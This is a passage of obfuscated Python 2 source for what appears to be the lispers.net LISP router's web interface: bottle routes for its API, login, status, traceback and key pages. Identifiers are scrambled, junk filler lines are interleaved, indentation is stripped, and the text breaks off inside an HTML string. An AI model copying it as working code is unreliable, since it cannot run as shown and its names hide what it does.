if 78 - 78: iIii1I11I1II1 - Ii1I * OoO0O00 + o0oOOo0O0Ooo + iII111i + iII111i
if 11 - 11: iII111i - OoO0O00 % ooOoO0o % iII111i / OoOoOO00 - OoO0O00
if 74 - 74: iII111i * O0
if 89 - 89: oO0o + Oo0Ooo
if ( command != "" ) :
command = "lisp " + command
else :
II = bottle . request . body . readline ( )
if ( II == "" ) :
IIIi1i1I = [ { "?" : [ { "?" : "no-body" } ] } ]
return ( json . dumps ( IIIi1i1I ) )
if 3 - 3: i1IIi / I1IiiI % I11i * i11iIiiIii / O0 * I11i
if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
IIIi1i1I = json . loads ( II )
command = IIIi1i1I . keys ( ) [ 0 ]
if 48 - 48: I11i + I11i / II111iiii / iIii1I11I1II1
if 20 - 20: o0oOOo0O0Ooo
IIIi1i1I = lispconfig . lisp_get_clause_for_api ( command )
return ( json . dumps ( IIIi1i1I ) )
if 77 - 77: OoOoOO00 / I11i
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
if 53 - 53: IiII + I1IiiI * oO0o
if 61 - 61: i1IIi * OOooOOo / OoooooooOO . i11iIiiIii . OoOoOO00
def o00O ( ) :
IIIi1i1I = { }
IIIi1i1I [ "hostname" ] = socket . gethostname ( )
IIIi1i1I [ "system-uptime" ] = commands . getoutput ( "uptime" )
IIIi1i1I [ "lisp-uptime" ] = lisp . lisp_print_elapsed ( lisp . lisp_uptime )
IIIi1i1I [ "lisp-version" ] = lisp . lisp_version
if 69 - 69: oO0o % I1Ii111 - o0oOOo0O0Ooo + I1Ii111 - O0 % OoooooooOO
Iii111II = "yes" if os . path . exists ( "./logs/lisp-traceback.log" ) else "no"
IIIi1i1I [ "traceback-log" ] = Iii111II
if 9 - 9: OoO0O00
i11 = lisp . lisp_myrlocs [ 0 ]
O0oo0OO0oOOOo = lisp . lisp_myrlocs [ 1 ]
i11 = "none" if ( i11 == None ) else i11 . print_address_no_iid ( )
O0oo0OO0oOOOo = "none" if ( O0oo0OO0oOOOo == None ) else O0oo0OO0oOOOo . print_address_no_iid ( )
IIIi1i1I [ "lisp-rlocs" ] = [ i11 , O0oo0OO0oOOOo ]
return ( json . dumps ( IIIi1i1I ) )
if 35 - 35: IiII % I1IiiI
if 70 - 70: iII111i * I1ii11iIi11i
if 46 - 46: ooOoO0o / OoO0O00
if 52 - 52: o0oOOo0O0Ooo - OoooooooOO + Ii1I + Ii1I - o0oOOo0O0Ooo / I1Ii111
if 44 - 44: ooOoO0o . i1IIi - I1ii11iIi11i . O0 - ooOoO0o
if 92 - 92: iII111i . I11i + o0oOOo0O0Ooo
if 28 - 28: i1IIi * Oo0Ooo - o0oOOo0O0Ooo * IiII * Ii1I / OoO0O00
if 94 - 94: II111iiii % I1ii11iIi11i / OoOoOO00 * iIii1I11I1II1
if 54 - 54: o0oOOo0O0Ooo - I1IiiI + OoooooooOO
if 70 - 70: Ii1I / I11i . iII111i % Oo0Ooo
if 67 - 67: OoOoOO00 * o0oOOo0O0Ooo . IiII - OoO0O00 * o0oOOo0O0Ooo
if 46 - 46: OOooOOo + OoOoOO00 . I1IiiI * oO0o % IiII
if 86 - 86: I1IiiI + Ii1I % i11iIiiIii * oO0o . ooOoO0o * I11i
if 44 - 44: oO0o
if 88 - 88: I1Ii111 % Ii1I . II111iiii
def o0o00ooo0 ( data_structure , data ) :
iI1ii1Ii = [ "site-cache" , "map-cache" , "system" , "map-resolver" ,
"map-server" ]
if 92 - 92: OoOoOO00
if ( data_structure not in iI1ii1Ii ) : return ( json . dumps ( [ ] ) )
if 26 - 26: iII111i . I1Ii111
if 68 - 68: OoO0O00
if 35 - 35: OoO0O00 - iII111i / Oo0Ooo / OoOoOO00
if 24 - 24: ooOoO0o - ooOoO0o / II111iiii - I1ii11iIi11i
if ( data_structure == "system" ) : return ( o00O ( ) )
if 69 - 69: oO0o . I1Ii111 + Ii1I / Oo0Ooo - oO0o
if 63 - 63: OOooOOo % oO0o * oO0o * OoO0O00 / I1ii11iIi11i
if 74 - 74: II111iiii
if 75 - 75: o0oOOo0O0Ooo . ooOoO0o
if ( data != "" ) : data = json . dumps ( data )
Oo0O00Oo0o0 = lisp . lisp_api_ipc ( "lisp-core" , data_structure + "%" + data )
if 87 - 87: ooOoO0o * Oo0Ooo % i11iIiiIii % OoOoOO00 - OOooOOo
if ( data_structure in [ "map-cache" , "map-resolver" ] ) :
if ( lisp . lisp_is_running ( "lisp-rtr" ) ) :
lisp . lisp_ipc_lock . acquire ( )
lisp . lisp_ipc ( Oo0O00Oo0o0 , Oo , "lisp-rtr" )
elif ( lisp . lisp_is_running ( "lisp-itr" ) ) :
lisp . lisp_ipc_lock . acquire ( )
lisp . lisp_ipc ( Oo0O00Oo0o0 , Oo , "lisp-itr" )
else :
return ( json . dumps ( [ ] ) )
if 68 - 68: I1Ii111 % i1IIi . IiII . I1ii11iIi11i
if 92 - 92: iII111i . I1Ii111
if ( data_structure == "map-server" ) :
if ( lisp . lisp_is_running ( "lisp-etr" ) ) :
lisp . lisp_ipc_lock . acquire ( )
lisp . lisp_ipc ( Oo0O00Oo0o0 , Oo , "lisp-etr" )
else :
return ( json . dumps ( [ ] ) )
if 31 - 31: I1Ii111 . OoOoOO00 / O0
if 89 - 89: OoOoOO00
if ( data_structure == "site-cache" ) :
if ( lisp . lisp_is_running ( "lisp-ms" ) ) :
lisp . lisp_ipc_lock . acquire ( )
lisp . lisp_ipc ( Oo0O00Oo0o0 , Oo , "lisp-ms" )
else :
return ( json . dumps ( [ ] ) )
if 68 - 68: OoO0O00 * OoooooooOO % O0 + OoO0O00 + ooOoO0o
if 4 - 4: ooOoO0o + O0 * OOooOOo
if 55 - 55: Oo0Ooo + iIii1I11I1II1 / OoOoOO00 * oO0o - i11iIiiIii - Ii1I
lisp . lprint ( "Waiting for api get-data '{}', parmameters: '{}'" . format ( data_structure , data ) )
if 25 - 25: I1ii11iIi11i
if 7 - 7: i1IIi / I1IiiI * I1Ii111 . IiII . iIii1I11I1II1
iIii , ooo0O , oOoO0o00OO0 , i1I1ii = lisp . lisp_receive ( Oo , True )
lisp . lisp_ipc_lock . release ( )
return ( i1I1ii )
if 61 - 61: II111iiii
if 64 - 64: ooOoO0o / OoOoOO00 - O0 - I11i
if 86 - 86: I11i % OoOoOO00 / I1IiiI / OoOoOO00
if 42 - 42: OoO0O00
if 67 - 67: I1Ii111 . iII111i . O0
if 10 - 10: I1ii11iIi11i % I1ii11iIi11i - iIii1I11I1II1 / OOooOOo + Ii1I
if 87 - 87: oO0o * I1ii11iIi11i + OOooOOo / iIii1I11I1II1 / iII111i
@ bottle . route ( '/lisp/api' , method = "put" )
@ bottle . route ( '/lisp/api/<command>' , method = "put" )
@ bottle . route ( '/lisp/api/<command>' , method = "delete" )
def I1111IIi ( command = "" ) :
IIIi1i1I = [ { "?" : [ { "?" : "not-auth" } ] } ]
if ( bottle . request . auth == None ) : return ( IIIi1i1I )
if 93 - 93: OoooooooOO / I1IiiI % i11iIiiIii + I1ii11iIi11i * OoO0O00
if 15 - 15: I11i . OoO0O00 / Oo0Ooo + I11i
if 78 - 78: O0 . oO0o . II111iiii % OOooOOo
if 49 - 49: Ii1I / OoO0O00 . II111iiii
if ( bottle . request . auth != None ) :
i1iIIi1 , ii11iIi1I = bottle . request . auth
if ( lispconfig . lisp_find_user_account ( i1iIIi1 , ii11iIi1I ) == False ) :
return ( json . dumps ( IIIi1i1I ) )
if 68 - 68: i11iIiiIii % I1ii11iIi11i + i11iIiiIii
else :
if ( bottle . request . headers [ "User-Agent" ] . find ( "python" ) != - 1 ) :
return ( json . dumps ( IIIi1i1I ) )
if 31 - 31: II111iiii . I1IiiI
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( json . dumps ( IIIi1i1I ) )
if 1 - 1: Oo0Ooo / o0oOOo0O0Ooo % iII111i * IiII . i11iIiiIii
if 2 - 2: I1ii11iIi11i * I11i - iIii1I11I1II1 + I1IiiI . oO0o % iII111i
if 92 - 92: iII111i
if 25 - 25: Oo0Ooo - I1IiiI / OoooooooOO / o0oOOo0O0Ooo
if 12 - 12: I1IiiI * iII111i % i1IIi % iIii1I11I1II1
if 20 - 20: OOooOOo % Ii1I / Ii1I + Ii1I
if 45 - 45: oO0o - IiII - OoooooooOO - OoO0O00 . II111iiii / O0
if ( command == "user-account" ) :
if ( lispconfig . lisp_is_user_superuser ( i1iIIi1 ) == False ) :
IIIi1i1I = [ { "user-account" : [ { "?" : "not-auth" } ] } ]
return ( json . dumps ( IIIi1i1I ) )
if 51 - 51: O0 + iII111i
if 8 - 8: oO0o * OoOoOO00 - Ii1I - OoO0O00 * OOooOOo % I1IiiI
if 48 - 48: O0
if 11 - 11: I11i + OoooooooOO - OoO0O00 / o0oOOo0O0Ooo + Oo0Ooo . II111iiii
if 41 - 41: Ii1I - O0 - O0
if 68 - 68: OOooOOo % I1Ii111
II = bottle . request . body . readline ( )
if ( II == "" ) :
IIIi1i1I = [ { "?" : [ { "?" : "no-body" } ] } ]
return ( json . dumps ( IIIi1i1I ) )
if 88 - 88: iIii1I11I1II1 - ooOoO0o + OOooOOo
if 40 - 40: I1IiiI * Ii1I + OOooOOo % iII111i
IIIi1i1I = json . loads ( II )
if ( command != "" ) :
command = "lisp " + command
else :
command = IIIi1i1I [ 0 ] . keys ( ) [ 0 ]
if 74 - 74: oO0o - Oo0Ooo + OoooooooOO + I1Ii111 / OoOoOO00
if 23 - 23: O0
if 85 - 85: Ii1I
if 84 - 84: I1IiiI . iIii1I11I1II1 % OoooooooOO + Ii1I % OoooooooOO % OoO0O00
if 42 - 42: OoO0O00 / I11i / o0oOOo0O0Ooo + iII111i / OoOoOO00
if 84 - 84: ooOoO0o * II111iiii + Oo0Ooo
lisp . lisp_ipc_lock . acquire ( )
if ( bottle . request . method == "DELETE" ) :
IIIi1i1I = lispconfig . lisp_remove_clause_for_api ( IIIi1i1I )
else :
IIIi1i1I = lispconfig . lisp_put_clause_for_api ( IIIi1i1I )
if 53 - 53: iII111i % II111iiii . IiII - iIii1I11I1II1 - IiII * II111iiii
lisp . lisp_ipc_lock . release ( )
return ( json . dumps ( IIIi1i1I ) )
if 77 - 77: iIii1I11I1II1 * OoO0O00
if 95 - 95: I1IiiI + i11iIiiIii
if 6 - 6: ooOoO0o / i11iIiiIii + iII111i * oO0o
if 80 - 80: II111iiii
if 83 - 83: I11i . i11iIiiIii + II111iiii . o0oOOo0O0Ooo * I11i
@ bottle . route ( '/lisp/show/api-doc' , method = "get" )
def oooO0 ( ) :
if ( os . path . exists ( "lispapi.py" ) ) : os . system ( "pydoc lispapi > lispapi.txt" )
if ( os . path . exists ( "lispapi.txt" ) == False ) :
return ( "lispapi.txt file not found" )
if 46 - 46: I1Ii111
return ( bottle . static_file ( "lispapi.txt" , root = "./" ) )
if 60 - 60: o0oOOo0O0Ooo
if 25 - 25: OoO0O00
if 62 - 62: OOooOOo + O0
if 98 - 98: o0oOOo0O0Ooo
if 51 - 51: Oo0Ooo - oO0o + II111iiii * Ii1I . I11i + oO0o
@ bottle . route ( '/lisp/show/command-doc' , method = "get" )
def OoO0o ( ) :
return ( bottle . static_file ( "lisp.config.example" , root = "./" ,
mimetype = "text/plain" ) )
if 78 - 78: oO0o % O0 % Ii1I
if 46 - 46: OoooooooOO . i11iIiiIii
if 94 - 94: o0oOOo0O0Ooo * Ii1I / Oo0Ooo / Ii1I
if 87 - 87: Oo0Ooo . IiII
if 75 - 75: ooOoO0o + OoOoOO00 + o0oOOo0O0Ooo * I11i % oO0o . iII111i
if 55 - 55: OOooOOo . I1IiiI
if 61 - 61: Oo0Ooo % IiII . Oo0Ooo
@ bottle . route ( '/lisp/show/lisp-xtr' , method = "get" )
def o0oOO000oO0oo ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 77 - 77: Oo0Ooo - i1IIi - I11i . OoOoOO00
if 39 - 39: II111iiii / ooOoO0o + I1Ii111 / OoOoOO00
if 13 - 13: IiII + O0 + iII111i % I1IiiI / o0oOOo0O0Ooo . IiII
if 86 - 86: oO0o * o0oOOo0O0Ooo % i1IIi . Ii1I . i11iIiiIii
if 56 - 56: I1ii11iIi11i % O0 - I1IiiI
if 100 - 100: Ii1I - O0 % oO0o * OOooOOo + I1IiiI
if ( os . path . exists ( "./show-ztr" ) ) :
Oo0O0oooo = open ( "./show-ztr" , "r" ) ; I111iI = Oo0O0oooo . read ( ) ; Oo0O0oooo . close ( )
else :
Oo0O0oooo = open ( "./show-xtr" , "r" ) ; I111iI = Oo0O0oooo . read ( ) ; Oo0O0oooo . close ( )
if 56 - 56: I1IiiI
if 54 - 54: I1Ii111 / OOooOOo . oO0o % iII111i
OoO0OOOOo0O = ""
I111iI = I111iI . split ( "\n" )
for OooOO in I111iI :
if ( OooOO [ 0 : 4 ] == " " ) : OoO0OOOOo0O += lisp . lisp_space ( 4 )
if ( OooOO [ 0 : 2 ] == " " ) : OoO0OOOOo0O += lisp . lisp_space ( 2 )
OoO0OOOOo0O += OooOO + "<br>"
if 21 - 21: I11i / IiII % iIii1I11I1II1 * Oo0Ooo
OoO0OOOOo0O = lisp . convert_font ( OoO0OOOOo0O )
return ( lisp . lisp_print_sans ( OoO0OOOOo0O ) )
if 57 - 57: II111iiii + i1IIi
if 10 - 10: oO0o + i1IIi
if 87 - 87: I1IiiI
if 58 - 58: OoOoOO00 % o0oOOo0O0Ooo
if 50 - 50: I1Ii111 . o0oOOo0O0Ooo
if 97 - 97: O0 + OoOoOO00
if 89 - 89: o0oOOo0O0Ooo + OoO0O00 * I11i * Ii1I
@ bottle . route ( '/lisp/show/<xtr>/keys' , method = "get" )
def iiIiI1i1 ( xtr ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 69 - 69: ooOoO0o
I11iII = lispconfig . lisp_is_user_superuser ( None )
if 5 - 5: I1IiiI
if ( I11iII == False ) :
i1I1ii = "Permission denied"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( i1I1ii ) ) )
if 48 - 48: o0oOOo0O0Ooo - oO0o / OoooooooOO
if 100 - 100: I1IiiI / o0oOOo0O0Ooo % II111iiii % Oo0Ooo % OOooOOo
if ( xtr not in [ "itr" , "etr" , "rtr" ] ) :
i1I1ii = "Invalid URL"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( i1I1ii ) ) )
if 98 - 98: I11i % i11iIiiIii % ooOoO0o + Ii1I
OOoOO0o0o0 = "show {}-keys" . format ( xtr )
return ( lispconfig . lisp_process_show_command ( Oo , OOoOO0o0o0 ) )
if 11 - 11: I1IiiI
if 16 - 16: Ii1I + IiII * O0 % i1IIi . I1IiiI
if 67 - 67: OoooooooOO / I1IiiI * Ii1I + I11i
if 65 - 65: OoooooooOO - I1ii11iIi11i / ooOoO0o / II111iiii / i1IIi
if 71 - 71: I1Ii111 + Ii1I
if 28 - 28: OOooOOo
if 38 - 38: ooOoO0o % II111iiii % I11i / OoO0O00 + OoOoOO00 / i1IIi
if 54 - 54: iIii1I11I1II1 % I1ii11iIi11i - OOooOOo / oO0o - OoO0O00 . I11i
@ bottle . route ( '/lisp/geo-map/<geo_prefix>' )
def IIo0Oo0oO0oOO00 ( geo_prefix ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 92 - 92: OoooooooOO * I1Ii111
if 100 - 100: I1Ii111 + I1Ii111 * IiII
geo_prefix = geo_prefix . split ( "-" )
geo_prefix = "-" . join ( geo_prefix [ 0 : - 1 ] ) + "/" + geo_prefix [ - 1 ]
I1i = lisp . lisp_geo ( "" )
I1i . parse_geo_string ( geo_prefix )
O00Oooo , i11I = I1i . dms_to_decimal ( )
o00Oo0oooooo = I1i . radius * 1000
if 76 - 76: I11i / OOooOOo . O0 % I1IiiI . o0oOOo0O0Ooo + IiII
o0o = open ( "./lispers.net-geo.html" , "r" ) ; oo0 = o0o . read ( ) ; o0o . close ( )
oo0 = oo0 . replace ( "$LAT" , str ( O00Oooo ) )
oo0 = oo0 . replace ( "$LON" , str ( i11I ) )
oo0 = oo0 . replace ( "$RADIUS" , str ( o00Oo0oooooo ) )
return ( oo0 )
if 61 - 61: OoOoOO00 - OOooOOo - i1IIi
if 25 - 25: O0 * I11i + I1ii11iIi11i . o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 58 - 58: I1IiiI
if 53 - 53: i1IIi
if 59 - 59: o0oOOo0O0Ooo
if 81 - 81: OoOoOO00 - OoOoOO00 . iII111i
if 73 - 73: I11i % i11iIiiIii - I1IiiI
@ bottle . route ( '/lisp/login' , method = "get" )
def oOO00O ( ) :
return ( lispconfig . lisp_login_page ( ) )
if 7 - 7: O0 * i11iIiiIii * Ii1I + ooOoO0o % OoO0O00 - ooOoO0o
if 39 - 39: Oo0Ooo * OOooOOo % OOooOOo - OoooooooOO + o0oOOo0O0Ooo - I11i
if 23 - 23: i11iIiiIii
if 30 - 30: o0oOOo0O0Ooo - i1IIi % II111iiii + I11i * iIii1I11I1II1
if 81 - 81: IiII % i1IIi . iIii1I11I1II1
if 4 - 4: i11iIiiIii % OoO0O00 % i1IIi / IiII
if 6 - 6: iII111i / I1IiiI % OOooOOo - I1IiiI
if 31 - 31: OOooOOo
@ bottle . route ( '/lisp/login' , method = "post" )
def i1 ( ) :
if ( lispconfig . lisp_validate_user ( ) ) :
return ( lispconfig . lisp_landing_page ( ) )
if 88 - 88: OoO0O00 - ooOoO0o + OOooOOo * I1IiiI % iIii1I11I1II1 + Oo0Ooo
return ( oOO00O ( ) )
if 76 - 76: I1IiiI * iII111i % I1Ii111
if 57 - 57: iIii1I11I1II1 - i1IIi / I1Ii111 - O0 * OoooooooOO % II111iiii
if 68 - 68: OoooooooOO * I11i % OoOoOO00 - IiII
if 34 - 34: I1Ii111 . iIii1I11I1II1 * OoOoOO00 * oO0o / I1Ii111 / I1ii11iIi11i
if 78 - 78: Oo0Ooo - o0oOOo0O0Ooo / OoOoOO00
if 10 - 10: iII111i + Oo0Ooo * I1ii11iIi11i + iIii1I11I1II1 / I1Ii111 / I1ii11iIi11i
if 42 - 42: I1IiiI
@ bottle . route ( '/lisp' )
def II1i11I ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 50 - 50: OoooooooOO % I11i
return ( lispconfig . lisp_landing_page ( ) )
if 49 - 49: oO0o - i11iIiiIii . I1Ii111 * Ii1I % iII111i + i1IIi
if 71 - 71: o0oOOo0O0Ooo
if 38 - 38: oO0o % OoOoOO00 + I1ii11iIi11i . i11iIiiIii
if 53 - 53: i11iIiiIii * iII111i
if 68 - 68: iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / II111iiii % Oo0Ooo
if 38 - 38: ooOoO0o - OOooOOo / iII111i
if 66 - 66: O0 % I1ii11iIi11i + i11iIiiIii . OoOoOO00 / Ii1I + I1ii11iIi11i
@ bottle . route ( '/lisp/traceback' )
def ooo00Ooo ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 93 - 93: i11iIiiIii - I1IiiI * I1ii11iIi11i * I11i % O0 + OoooooooOO
if 25 - 25: IiII + Ii1I / ooOoO0o . o0oOOo0O0Ooo % O0 * OoO0O00
o0O0oo0OO0O = True
if 68 - 68: oO0o . I11i % OoooooooOO . I11i
if 64 - 64: iIii1I11I1II1 / I1IiiI . II111iiii + OoooooooOO . OoO0O00
if 56 - 56: Oo0Ooo . I1ii11iIi11i . I1IiiI
if 39 - 39: O0 + I1Ii111
if ( os . path . exists ( "./logs/lisp-traceback.log" ) ) :
i1I1ii = commands . getoutput ( "cat ./logs/lisp-traceback.log" )
if ( i1I1ii ) :
i1I1ii = i1I1ii . replace ( "----------" , "<b>----------</b>" )
i1I1ii = i1I1ii . replace ( "\n" , "<br>" )
o0O0oo0OO0O = False
if 91 - 91: OoooooooOO - iIii1I11I1II1 + OoOoOO00 / OoO0O00 . OoOoOO00 + O0
if 26 - 26: I1ii11iIi11i - OoooooooOO
if 11 - 11: I1IiiI * oO0o
if 81 - 81: iII111i + IiII
if 98 - 98: I1IiiI
if 95 - 95: ooOoO0o / ooOoO0o
if ( o0O0oo0OO0O ) :
i1I1ii = ""
IIiI1Ii = "egrep --with-filename Traceback ./logs/*.log"
O0O0O0Oo = commands . getoutput ( IIiI1Ii )
for OOOOoO00o0O in O0O0O0Oo :
if ( OOOOoO00o0O . find ( ":" ) == - 1 ) : continue
OooOO = OOOOoO00o0O . split ( ":" )
if ( OooOO [ 1 ] == "0" ) : continue
i1I1ii += "Found Tracebacks in log file {}<br>" . format ( OooOO [ 0 ] )
o0O0oo0OO0O = False
if 41 - 41: OOooOOo * Ii1I - IiII + o0oOOo0O0Ooo
i1I1ii = i1I1ii [ 0 : - 4 ]
if 64 - 64: Ii1I
if 66 - 66: i11iIiiIii - OOooOOo * Oo0Ooo
if ( o0O0oo0OO0O ) :
i1I1ii = "No Tracebacks found - a stable system is a happy system"
if 76 - 76: i11iIiiIii + o0oOOo0O0Ooo / I1ii11iIi11i - OoO0O00 - Ii1I + I1ii11iIi11i
if 51 - 51: iIii1I11I1II1 . ooOoO0o + iIii1I11I1II1
i1I1ii = lisp . lisp_print_cour ( i1I1ii )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 95 - 95: I1IiiI
if 46 - 46: OoOoOO00 + OoO0O00
if 70 - 70: iII111i / iIii1I11I1II1
if 85 - 85: OoooooooOO % i1IIi * OoooooooOO / I1ii11iIi11i
if 96 - 96: OoooooooOO + oO0o
if 44 - 44: oO0o
if 20 - 20: I11i + Ii1I / O0 % iIii1I11I1II1
@ bottle . route ( '/lisp/show/not-supported' )
def oOo0O ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 64 - 64: I1ii11iIi11i - iII111i + iII111i - I11i
return ( lispconfig . lisp_not_supported ( ) )
if 30 - 30: iIii1I11I1II1 . I1IiiI . OOooOOo / o0oOOo0O0Ooo
if 42 - 42: Oo0Ooo
if 19 - 19: oO0o % I1ii11iIi11i * iIii1I11I1II1 + I1IiiI
if 46 - 46: Oo0Ooo
if 1 - 1: iII111i
if 97 - 97: OOooOOo + iII111i + O0 + i11iIiiIii
if 77 - 77: o0oOOo0O0Ooo / OoooooooOO
@ bottle . route ( '/lisp/show/status' )
def IIii11I1i1I ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 99 - 99: iII111i
if 76 - 76: OoO0O00 * I1IiiI
if 82 - 82: Ii1I * iII111i / I1ii11iIi11i
if 36 - 36: OoooooooOO - i1IIi . O0 / II111iiii + o0oOOo0O0Ooo
if 33 - 33: II111iiii / ooOoO0o * O0 % Ii1I * I1Ii111
i1I1ii = ""
I11iII = lispconfig . lisp_is_user_superuser ( None )
if ( I11iII ) :
O0o = lisp . lisp_button ( "show configuration" , "/lisp/show/conf" )
O0OOoOOO0oO = lisp . lisp_button ( "show configuration diff" , "/lisp/show/diff" )
I1ii11 = lisp . lisp_button ( "archive configuration" , "/lisp/archive/conf" )
oOoOoOoo0 = lisp . lisp_button ( "clear configuration" , "/lisp/clear/conf/verify" )
OOOOoO00o0O = lisp . lisp_button ( "log flows" , "/lisp/log/flows" )
III1ii1I = lisp . lisp_button ( "install LISP software" , "/lisp/install/image" )
Ii1i1iI = lisp . lisp_button ( "restart LISP subsystem" , "/lisp/restart/verify" )
if 16 - 16: OOooOOo / Oo0Ooo / OoooooooOO * I1IiiI + i1IIi % OOooOOo
i1I1ii = "<center>{}{}{}{}{}{}{}</center><hr>" . format ( O0o , O0OOoOOO0oO , I1ii11 , oOoOoOoo0 ,
OOOOoO00o0O , III1ii1I , Ii1i1iI )
if 71 - 71: OoOoOO00
if 14 - 14: i11iIiiIii % OOooOOo
OooO0oo = commands . getoutput ( "uptime" )
o0o0oOoOO0O = commands . getoutput ( "uname -pv" )
i1ii1II1ii = lisp . lisp_version . replace ( "+" , "" )
if 28 - 28: I1ii11iIi11i
if 61 - 61: OOooOOo % OOooOOo * o0oOOo0O0Ooo / o0oOOo0O0Ooo
if 75 - 75: IiII . ooOoO0o
if 50 - 50: OoOoOO00
if 60 - 60: ooOoO0o * iIii1I11I1II1 * I1ii11iIi11i * Oo0Ooo
O0ooooo0OOOO0 = multiprocessing . cpu_count ( )
if 9 - 9: II111iiii - o0oOOo0O0Ooo / iII111i / o0oOOo0O0Ooo
I1i111iiIIIi = OooO0oo . find ( ", load" )
OooO0oo = OooO0oo [ 0 : I1i111iiIIIi ]
O00 = lisp . lisp_print_elapsed ( lisp . lisp_uptime )
if 17 - 17: Ii1I - OoooooooOO % Ii1I . IiII / i11iIiiIii % iII111i
iIiIIIIIii = "Not available"
if 58 - 58: o0oOOo0O0Ooo / IiII . OoOoOO00 / OoooooooOO + I1Ii111
if 86 - 86: I11i * I1IiiI + I11i + II111iiii
if 8 - 8: I1Ii111 - iII111i / ooOoO0o
if 96 - 96: OoOoOO00
OOoOO0o0o0 = "ps auww" if lisp . lisp_is_macos ( ) else "ps aux"
IIiiI = commands . getoutput ( "{} | egrep 'PID|python lisp|python -O lisp' | egrep -v grep" . format ( OOoOO0o0o0 ) )
if 31 - 31: I1ii11iIi11i + Ii1I + I1Ii111 / Ii1I
if 25 - 25: OoO0O00
IIiiI = IIiiI . replace ( " " , lisp . space ( 1 ) )
IIiiI = IIiiI . replace ( "\n" , "<br>" )
if 24 - 24: IiII * i11iIiiIii * OOooOOo
if 85 - 85: o0oOOo0O0Ooo . OoOoOO00 / ooOoO0o . O0 % I1Ii111
if 90 - 90: Oo0Ooo % O0 * iIii1I11I1II1 . iII111i
if 8 - 8: ooOoO0o + II111iiii / iII111i / I11i
if ( o0o0oOoOO0O . find ( "Darwin" ) != - 1 ) :
O0ooooo0OOOO0 = O0ooooo0OOOO0 / 2
iIiIIIIIii = commands . getoutput ( "top -l 1 | head -50" )
iIiIIIIIii = iIiIIIIIii . split ( "PID" )
iIiIIIIIii = iIiIIIIIii [ 0 ]
if 74 - 74: O0 / i1IIi
if 78 - 78: OoooooooOO . OoO0O00 + ooOoO0o - i1IIi
if 31 - 31: OoooooooOO . OOooOOo
if 83 - 83: iII111i . O0 / Oo0Ooo / OOooOOo - II111iiii
if 100 - 100: OoO0O00
I1i111iiIIIi = iIiIIIIIii . find ( "Load Avg" )
II1i = iIiIIIIIii [ 0 : I1i111iiIIIi ] . find ( "threads" )
Ii1IIIIi1ii1I = iIiIIIIIii [ 0 : II1i + 7 ]
iIiIIIIIii = Ii1IIIIi1ii1I + "<br>" + iIiIIIIIii [ I1i111iiIIIi : : ]
I1i111iiIIIi = iIiIIIIIii . find ( "CPU usage" )
iIiIIIIIii = iIiIIIIIii [ 0 : I1i111iiIIIi ] + "<br>" + iIiIIIIIii [ I1i111iiIIIi : : ]
I1i111iiIIIi = iIiIIIIIii . find ( "SharedLibs:" )
iIiIIIIIii = iIiIIIIIii [ 0 : I1i111iiIIIi ] + "<br>" + iIiIIIIIii [ I1i111iiIIIi : : ]
I1i111iiIIIi = iIiIIIIIii . find ( "MemRegions" )
iIiIIIIIii = iIiIIIIIii [ 0 : I1i111iiIIIi ] + "<br>" + iIiIIIIIii [ I1i111iiIIIi : : ]
I1i111iiIIIi = iIiIIIIIii . find ( "PhysMem" )
iIiIIIIIii = iIiIIIIIii [ 0 : I1i111iiIIIi ] + "<br>" + iIiIIIIIii [ I1i111iiIIIi : : ]
I1i111iiIIIi = iIiIIIIIii . find ( "VM:" )
iIiIIIIIii = iIiIIIIIii [ 0 : I1i111iiIIIi ] + "<br>" + iIiIIIIIii [ I1i111iiIIIi : : ]
I1i111iiIIIi = iIiIIIIIii . find ( "Networks" )
iIiIIIIIii = iIiIIIIIii [ 0 : I1i111iiIIIi ] + "<br>" + iIiIIIIIii [ I1i111iiIIIi : : ]
I1i111iiIIIi = iIiIIIIIii . find ( "Disks" )
iIiIIIIIii = iIiIIIIIii [ 0 : I1i111iiIIIi ] + "<br>" + iIiIIIIIii [ I1i111iiIIIi : : ]
else :
if 13 - 13: I1IiiI % OoOoOO00 . I1ii11iIi11i / Oo0Ooo % OOooOOo . OoooooooOO
if 22 - 22: IiII / i11iIiiIii
if 62 - 62: OoO0O00 / I1ii11iIi11i
if 7 - 7: OoooooooOO . IiII
I111iI = commands . getoutput ( "top -b -n 1 | head -50" )
I111iI = I111iI . split ( "PID" )
I111iI [ 1 ] = I111iI [ 1 ] . replace ( " " , lisp . space ( 1 ) )
I111iI = I111iI [ 0 ] + I111iI [ 1 ]
iIiIIIIIii = I111iI . replace ( "\n" , "<br>" )
if 53 - 53: Ii1I % Ii1I * o0oOOo0O0Ooo + OoOoOO00
if 92 - 92: OoooooooOO + i1IIi / Ii1I * O0
O00oOo00o0o = commands . getoutput ( "cat release-notes.txt" )
O00oOo00o0o = O00oOo00o0o . replace ( "\n" , "<br>" )
if 85 - 85: iII111i + OoooooooOO * iII111i - I1Ii111 % i11iIiiIii
i1I1ii += '''
<br><table align="center" border="1" cellspacing="3x" cellpadding="5x">
<tr>
<td width="20%"><i>LISP Subsystem Version:<br>
LISP Release {} Build Date:</i></td>
<td width="80%"><font face="Courier New">{}<br>
{}</font></td>
</tr>
<tr>
<td width="20%"><i>LISP Subsystem Uptime:<br>System Uptime:</i></td>
<td width="80%"><font face="Courier New">{}<br>
{}</font></td>
